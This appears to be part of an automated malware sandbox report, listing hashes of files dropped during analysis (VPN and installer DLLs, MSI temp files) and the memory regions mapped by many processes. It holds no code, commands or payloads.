SHA14a86313cc8766dcad1c2b00c2b8f9bbe0cf8bbbe
SHA256da7d0368712ee419952eb2640a65a7f24e39fb7872442ed4d2ee847ec4cfde77
SHA5123f98b5ad9adfad2111ebd1d8cbab9ae423d624d1668cc64c0bfcdbfedf30c1ce3ea6bc6bcf70f7dd1b01172a4349e7c84fb75d395ee5af73866574c1d734c6e8
-
\Users\Admin\AppData\Local\Temp\is-D0LKD.tmp\libMaskVPN.dllMD5
3d88c579199498b224033b6b66638fb8
SHA16f6303288e2206efbf18e4716095059fada96fc4
SHA2565bccb86319fc90210d065648937725b14b43fa0c96f9da56d9984e027adebbc3
SHA5129740c521ed38643201ed4c2574628454723b9213f12e193c11477e64a2c03daa58d2a48e70df1a7e9654c50a80049f3cf213fd01f2b74e585c3a86027db19ec9
-
\Users\Admin\AppData\Local\Temp\is-D0LKD.tmp\libMaskVPN.dllMD5
3d88c579199498b224033b6b66638fb8
SHA16f6303288e2206efbf18e4716095059fada96fc4
SHA2565bccb86319fc90210d065648937725b14b43fa0c96f9da56d9984e027adebbc3
SHA5129740c521ed38643201ed4c2574628454723b9213f12e193c11477e64a2c03daa58d2a48e70df1a7e9654c50a80049f3cf213fd01f2b74e585c3a86027db19ec9
-
\Users\Admin\AppData\Local\Temp\is-TK3NM.tmp\_isetup\_iscrypt.dllMD5
a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
\Users\Admin\AppData\Local\Temp\is-USLLT.tmp\_isetup\_iscrypt.dllMD5
a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\decoder.dllMD5
62326d3ef35667b1533673d2bb1d342c
SHA18100ce90b7cbddd7ef2fd77c544ebf12ebd5ec33
SHA256a087b791ff8ff9e05e339600199aa389a4554050acc7af7fa36dbe208be7382e
SHA5127321feae8ee8d0653d7bd935e3d2e6f658e6798b2a7a8f44976c58509028e79284582132cb999c7c3124a7e94960d9c5d5fc8edefaeda06275ab725730d0d9b5
-
\Windows\Installer\MSI8AD7.tmpMD5
07ce413b1af6342187514871dc112c74
SHA18008f8bfeae99918b6323a3d1270dea63b3a8394
SHA2560ba7e90fe2a0005e1e0dad53e2678916650c3b95ff9b666b802d128276c8ec46
SHA51227df52bfcbc2d0ce3756a2526e632b5610d7047259b31aeeff12652de3e046bcd239e39c222a323654f475f1f913679b4fdd858303e0e105f7a300b6f6ed0fe5
-
\Windows\Installer\MSI8DD5.tmpMD5
07ce413b1af6342187514871dc112c74
SHA18008f8bfeae99918b6323a3d1270dea63b3a8394
SHA2560ba7e90fe2a0005e1e0dad53e2678916650c3b95ff9b666b802d128276c8ec46
SHA51227df52bfcbc2d0ce3756a2526e632b5610d7047259b31aeeff12652de3e046bcd239e39c222a323654f475f1f913679b4fdd858303e0e105f7a300b6f6ed0fe5
-
\Windows\Installer\MSI8F0F.tmpMD5
07ce413b1af6342187514871dc112c74
SHA18008f8bfeae99918b6323a3d1270dea63b3a8394
SHA2560ba7e90fe2a0005e1e0dad53e2678916650c3b95ff9b666b802d128276c8ec46
SHA51227df52bfcbc2d0ce3756a2526e632b5610d7047259b31aeeff12652de3e046bcd239e39c222a323654f475f1f913679b4fdd858303e0e105f7a300b6f6ed0fe5
-
\Windows\Installer\MSI9087.tmpMD5
e6a708c70a8cfd78b7c0383615545158
SHA1b9274d9bf4750f557d34ddfd802113f5dd1df91c
SHA256e124c00f974e0c09200676e7ce2147c3822b4cd4764dcc970e832bd93d869d0c
SHA5122d0162f268f357a29c8bc35f855678e8e47e8a70825130e73e40a7dca1e9a3d8844b66616bfaa156b16fa4162bcf6991f659b3a6e8ee3caf841c87ec16189ff8
-
\Windows\Installer\MSI91FF.tmpMD5
f32ac1d425e8b7c320d6be9a968585ab
SHA13b0bd3122226f2ac9f11664d9fc13d699b6dcfa0
SHA25696f8d286f86055dcb3a15e0f3a2de092b0441ec36455c14caaad4c1f5a227894
SHA512d8d9d996e279b7500306614448d61d5c3ac9c2efc28ac71d1daa09951f342d2cf773f0a7b51cb847f4d91dd34018e4a2d7977c0f6f2859795d4f0df7ac894b27
-
memory/428-390-0x0000000000000000-mapping.dmp
-
memory/604-159-0x000002BA5A8E0000-0x000002BA5A8E2000-memory.dmpFilesize
8KB
-
memory/604-160-0x000002BA5A8E0000-0x000002BA5A8E2000-memory.dmpFilesize
8KB
-
memory/644-123-0x0000000000400000-0x000000000047C000-memory.dmpFilesize
496KB
-
memory/908-267-0x0000000001820000-0x0000000001821000-memory.dmpFilesize
4KB
-
memory/908-263-0x0000000000000000-mapping.dmp
-
memory/908-268-0x0000000001830000-0x0000000001831000-memory.dmpFilesize
4KB
-
memory/908-269-0x0000000000400000-0x00000000015D7000-memory.dmpFilesize
17.8MB
-
memory/908-275-0x00000000017E0000-0x000000000192A000-memory.dmpFilesize
1.3MB
-
memory/912-243-0x0000000000000000-mapping.dmp
-
memory/916-347-0x0000000000000000-mapping.dmp
-
memory/992-371-0x0000000000000000-mapping.dmp
-
memory/1012-436-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/1060-376-0x0000000000000000-mapping.dmp
-
memory/1088-134-0x0000000004600000-0x0000000004601000-memory.dmpFilesize
4KB
-
memory/1088-133-0x0000000000400000-0x0000000001860000-memory.dmpFilesize
20.4MB
-
memory/1088-132-0x0000000000400000-0x0000000001860000-memory.dmpFilesize
20.4MB
-
memory/1088-129-0x0000000000000000-mapping.dmp
-
memory/1132-172-0x0000000000400000-0x000000000047C000-memory.dmpFilesize
496KB
-
memory/1192-245-0x0000000000000000-mapping.dmp
-
memory/1196-128-0x00000000005D0000-0x00000000005D1000-memory.dmpFilesize
4KB
-
memory/1196-124-0x0000000000000000-mapping.dmp
-
memory/1296-328-0x0000000000000000-mapping.dmp
-
memory/1312-135-0x0000000000000000-mapping.dmp
-
memory/1348-193-0x0000000000000000-mapping.dmp
-
memory/1348-199-0x0000000002CC0000-0x0000000002CC1000-memory.dmpFilesize
4KB
-
memory/1348-197-0x0000000002CC0000-0x0000000002CC1000-memory.dmpFilesize
4KB
-
memory/1544-361-0x0000000000000000-mapping.dmp
-
memory/1604-287-0x0000000033AD0000-0x0000000033C96000-memory.dmpFilesize
1.8MB
-
memory/1604-289-0x0000000034450000-0x00000000345A8000-memory.dmpFilesize
1.3MB
-
memory/1604-291-0x00000000345B0000-0x0000000034608000-memory.dmpFilesize
352KB
-
memory/1604-280-0x0000000000400000-0x00000000015D7000-memory.dmpFilesize
17.8MB
-
memory/1604-284-0x00000000017E0000-0x000000000192A000-memory.dmpFilesize
1.3MB
-
memory/1680-294-0x0000000000000000-mapping.dmp
-
memory/1680-298-0x0000000002B60000-0x0000000002B61000-memory.dmpFilesize
4KB
-
memory/1680-297-0x0000000005200000-0x0000000005201000-memory.dmpFilesize
4KB
-
memory/1680-295-0x0000000000990000-0x0000000000991000-memory.dmpFilesize
4KB
-
memory/1680-300-0x0000000005930000-0x0000000005931000-memory.dmpFilesize
4KB
-
memory/1680-299-0x0000000005420000-0x0000000005421000-memory.dmpFilesize
4KB
-
memory/1692-395-0x0000000000000000-mapping.dmp
-
memory/1788-176-0x0000000002410000-0x0000000002411000-memory.dmpFilesize
4KB
-
memory/1788-177-0x0000000002410000-0x0000000002411000-memory.dmpFilesize
4KB
-
memory/1788-175-0x0000000000000000-mapping.dmp
-
memory/1840-285-0x0000000000000000-mapping.dmp
-
memory/1844-247-0x0000000000000000-mapping.dmp
-
memory/1844-261-0x00000000017E0000-0x000000000192A000-memory.dmpFilesize
1.3MB
-
memory/1844-259-0x0000000000400000-0x00000000015D7000-memory.dmpFilesize
17.8MB
-
memory/1844-258-0x00000000035E0000-0x00000000035E1000-memory.dmpFilesize
4KB
-
memory/1844-257-0x00000000017E0000-0x00000000017E1000-memory.dmpFilesize
4KB
-
memory/2120-276-0x0000000000400000-0x000000000047C000-memory.dmpFilesize
496KB
-
memory/2124-315-0x0000000000000000-mapping.dmp
-
memory/2180-335-0x0000000000000000-mapping.dmp
-
memory/2180-208-0x0000000000000000-mapping.dmp
-
memory/2188-225-0x0000000000000000-mapping.dmp
-
memory/2204-429-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2212-336-0x0000000000000000-mapping.dmp
-
memory/2284-217-0x0000000002E20000-0x0000000002E21000-memory.dmpFilesize
4KB
-
memory/2284-218-0x0000000002E20000-0x0000000002E21000-memory.dmpFilesize
4KB
-
memory/2284-216-0x0000000000000000-mapping.dmp
-
memory/2292-318-0x0000000001180000-0x0000000001197000-memory.dmpFilesize
92KB
-
memory/2292-317-0x0000000000000000-mapping.dmp
-
memory/2316-423-0x000000001B6E0000-0x000000001B6E2000-memory.dmpFilesize
8KB
-
memory/2336-273-0x0000000000000000-mapping.dmp
-
memory/2336-277-0x0000000000660000-0x00000000007AA000-memory.dmpFilesize
1.3MB
-
memory/2400-338-0x0000000000000000-mapping.dmp
-
memory/2400-349-0x0000000005820000-0x0000000005821000-memory.dmpFilesize
4KB
-
memory/2404-322-0x0000000000000000-mapping.dmp
-
memory/2472-399-0x0000000006C92000-0x0000000006C93000-memory.dmpFilesize
4KB
-
memory/2472-382-0x0000000000000000-mapping.dmp
-
memory/2472-286-0x0000000000000000-mapping.dmp
-
memory/2472-396-0x0000000006C90000-0x0000000006C91000-memory.dmpFilesize
4KB
-
memory/2784-391-0x0000000000000000-mapping.dmp
-
memory/2784-422-0x0000000004A80000-0x0000000004AF6000-memory.dmpFilesize
472KB
-
memory/2964-252-0x0000000004AA0000-0x0000000004AA1000-memory.dmpFilesize
4KB
-
memory/2964-264-0x0000000004A20000-0x0000000004A21000-memory.dmpFilesize
4KB
-
memory/2964-255-0x0000000004A60000-0x0000000004A61000-memory.dmpFilesize
4KB
-
memory/2964-256-0x0000000000400000-0x00000000009A4000-memory.dmpFilesize
5.6MB
-
memory/2964-253-0x0000000004A80000-0x0000000004A81000-memory.dmpFilesize
4KB
-
memory/2964-266-0x0000000004A00000-0x0000000004A01000-memory.dmpFilesize
4KB
-
memory/2964-265-0x0000000004A10000-0x0000000004A11000-memory.dmpFilesize
4KB
-
memory/2964-254-0x0000000004A40000-0x0000000004A41000-memory.dmpFilesize
4KB
-
memory/2964-242-0x0000000077790000-0x000000007791E000-memory.dmpFilesize
1.6MB
-
memory/2964-251-0x0000000004A90000-0x0000000004A91000-memory.dmpFilesize
4KB
-
memory/2964-262-0x00000000049E0000-0x00000000049E1000-memory.dmpFilesize
4KB
-
memory/2964-274-0x0000000004A70000-0x0000000004A71000-memory.dmpFilesize
4KB
-
memory/2964-249-0x00000000049F0000-0x00000000049F1000-memory.dmpFilesize
4KB
-
memory/2964-250-0x0000000004A30000-0x0000000004A31000-memory.dmpFilesize
4KB
-
memory/2964-248-0x0000000004A50000-0x0000000004A51000-memory.dmpFilesize
4KB
-
memory/2964-183-0x0000000000000000-mapping.dmp
-
memory/2984-348-0x0000000000000000-mapping.dmp
-
memory/2984-311-0x0000000000000000-mapping.dmp
-
memory/3052-215-0x0000000000000000-mapping.dmp
-
memory/3052-313-0x0000000000000000-mapping.dmp
-
memory/3156-241-0x0000000000000000-mapping.dmp
-
memory/3552-116-0x0000000002830000-0x0000000002831000-memory.dmpFilesize
4KB
-
memory/3552-115-0x0000000002830000-0x0000000002831000-memory.dmpFilesize
4KB
-
memory/3652-384-0x0000000000000000-mapping.dmp
-
memory/3668-360-0x0000000002EA0000-0x0000000002EA1000-memory.dmpFilesize
4KB
-
memory/3668-351-0x0000000000438ECE-mapping.dmp
-
memory/3684-232-0x0000000000400000-0x000000000047C000-memory.dmpFilesize
496KB
-
memory/3764-293-0x0000000000000000-mapping.dmp
-
memory/3856-387-0x0000000000000000-mapping.dmp
-
memory/3940-240-0x0000000000000000-mapping.dmp
-
memory/4024-148-0x0000000000000000-mapping.dmp
-
memory/4024-155-0x0000000000400000-0x000000000044C000-memory.dmpFilesize
304KB
-
memory/4060-337-0x0000000002260000-0x0000000002262000-memory.dmpFilesize
8KB
-
memory/4060-339-0x0000000002262000-0x0000000002264000-memory.dmpFilesize
8KB
-
memory/4060-341-0x0000000002265000-0x0000000002267000-memory.dmpFilesize
8KB
-
memory/4060-331-0x0000000000000000-mapping.dmp
-
memory/4060-340-0x0000000002264000-0x0000000002265000-memory.dmpFilesize
4KB
-
memory/4080-308-0x0000000000000000-mapping.dmp
-
memory/4080-310-0x0000000004300000-0x0000000004301000-memory.dmpFilesize
4KB
-
memory/4196-239-0x0000000000620000-0x00000000006CE000-memory.dmpFilesize
696KB
-
memory/4196-236-0x0000000000000000-mapping.dmp
-
memory/4208-235-0x0000000000000000-mapping.dmp
-
memory/4236-314-0x0000000000000000-mapping.dmp
-
memory/4244-316-0x0000000000000000-mapping.dmp
-
memory/4244-332-0x00000000030C0000-0x000000000325C000-memory.dmpFilesize
1.6MB
-
memory/4300-381-0x0000000000000000-mapping.dmp
-
memory/4336-303-0x0000000000000000-mapping.dmp
-
memory/4336-305-0x0000000002090000-0x0000000002091000-memory.dmpFilesize
4KB
-
memory/4452-373-0x0000000000000000-mapping.dmp
-
memory/4452-401-0x00000000068A2000-0x00000000068A3000-memory.dmpFilesize
4KB
-
memory/4452-393-0x00000000068A0000-0x00000000068A1000-memory.dmpFilesize
4KB
-
memory/4480-372-0x0000000000000000-mapping.dmp
-
memory/4536-198-0x0000000008E10000-0x0000000008E14000-memory.dmpFilesize
16KB
-
memory/4536-246-0x00000000071F0000-0x00000000071F1000-memory.dmpFilesize
4KB
-
memory/4536-206-0x0000000008E10000-0x0000000008E14000-memory.dmpFilesize
16KB
-
memory/4536-207-0x0000000008E10000-0x0000000008E14000-memory.dmpFilesize
16KB
-
memory/4536-204-0x0000000008E10000-0x0000000008E14000-memory.dmpFilesize
16KB
-
memory/4536-203-0x0000000008E10000-0x0000000008E14000-memory.dmpFilesize
16KB
-
memory/4536-202-0x0000000008E10000-0x0000000008E14000-memory.dmpFilesize
16KB
-
memory/4536-200-0x0000000008E10000-0x0000000008E14000-memory.dmpFilesize
16KB
-
memory/4536-196-0x0000000008C80000-0x0000000008C95000-memory.dmpFilesize
84KB
-
memory/4536-244-0x00000000022A0000-0x00000000022A1000-memory.dmpFilesize
4KB
-
memory/4536-205-0x0000000008E10000-0x0000000008E14000-memory.dmpFilesize
16KB
-
memory/4536-156-0x0000000000000000-mapping.dmp
-
memory/4536-192-0x0000000007200000-0x000000000720F000-memory.dmpFilesize
60KB
-
memory/4536-170-0x0000000006AF0000-0x0000000006DD0000-memory.dmpFilesize
2.9MB
-
memory/4536-171-0x00000000005C0000-0x000000000066E000-memory.dmpFilesize
696KB
-
memory/4588-427-0x0000000004BD0000-0x0000000004BD1000-memory.dmpFilesize
4KB
-
memory/4692-385-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4692-389-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4692-362-0x0000000000000000-mapping.dmp
-
memory/4692-379-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4692-383-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4720-142-0x0000000000000000-mapping.dmp
-
memory/4780-425-0x0000000004AC0000-0x0000000004B36000-memory.dmpFilesize
472KB
-
memory/4880-145-0x0000000000000000-mapping.dmp
-
memory/4880-424-0x0000000005570000-0x0000000005571000-memory.dmpFilesize
4KB
-
memory/4916-138-0x0000000000400000-0x000000000044C000-memory.dmpFilesize
304KB
-
memory/4916-139-0x0000000000414F3A-mapping.dmp
-
memory/4916-153-0x0000000000400000-0x000000000044C000-memory.dmpFilesize
304KB
-
memory/4916-141-0x0000000000400000-0x000000000044C000-memory.dmpFilesize
304KB
-
memory/4936-378-0x0000000000000000-mapping.dmp
-
memory/4968-281-0x0000000000000000-mapping.dmp
-
memory/4968-312-0x0000000000000000-mapping.dmp
-
memory/4968-288-0x0000000004440000-0x0000000004441000-memory.dmpFilesize
4KB
-
memory/4980-392-0x0000000000000000-mapping.dmp
-
memory/5024-165-0x0000000000000000-mapping.dmp
-
memory/5024-173-0x0000000000580000-0x000000000062E000-memory.dmpFilesize
696KB
-
memory/5040-306-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/5040-307-0x000000000041852A-mapping.dmp
-
memory/5056-304-0x0000000000400000-0x000000000047C000-memory.dmpFilesize
496KB
-
memory/5140-466-0x00000000053E0000-0x00000000059E6000-memory.dmpFilesize
6.0MB
-
memory/5152-468-0x00000000057F0000-0x0000000005DF6000-memory.dmpFilesize
6.0MB
-
memory/5232-437-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/5288-438-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB